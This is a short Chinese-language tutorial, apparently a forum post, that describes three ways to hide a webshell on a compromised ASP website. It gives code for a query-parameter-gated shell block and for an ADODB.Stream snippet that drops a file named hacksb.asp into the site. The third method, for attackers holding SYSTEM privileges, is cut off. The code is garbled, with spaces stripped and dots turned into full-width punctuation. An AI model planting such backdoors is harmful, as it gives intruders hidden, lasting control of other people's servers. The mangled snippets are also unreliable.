三种隐藏Webshell的方法?

第一种：

　　在我们要做手脚的asp文件里加入如下内容

　　<%ifrequest("action")="ok"then%>

　　shell代码插在这里

　　<%endif%>

　　访问的时候在你作手脚的asp文件后面加上？action=ok，即可

　　第二种：

　　在我们要做手脚的asp文件里加入如下内容

　　<%

　　onerrorresumenext

　　strFileName=Request。QueryString("filer")

　　setobjStream=Server。createObject("ABODB。Stream")

　　objStream。Type=1

　　objStream。Open

　　objStream。LoadFromFilestrFileName

　　objStream。SaveToFileServer。mappath("hacksb。asp")，2

　　%>

　　访问的时候在做手脚的asp文件后面加上？filer=xxx，

　　xxx为你本地上传的一个路径如C：\hacksb。asp，

　　上传后在做手脚的asp的同文件夹中会自动生成hacksb。asp

　　第三种：

　　前提得到system权限，

　　进入网站目录下一层

　　mkdirs…

　　copyhacksb。asps…/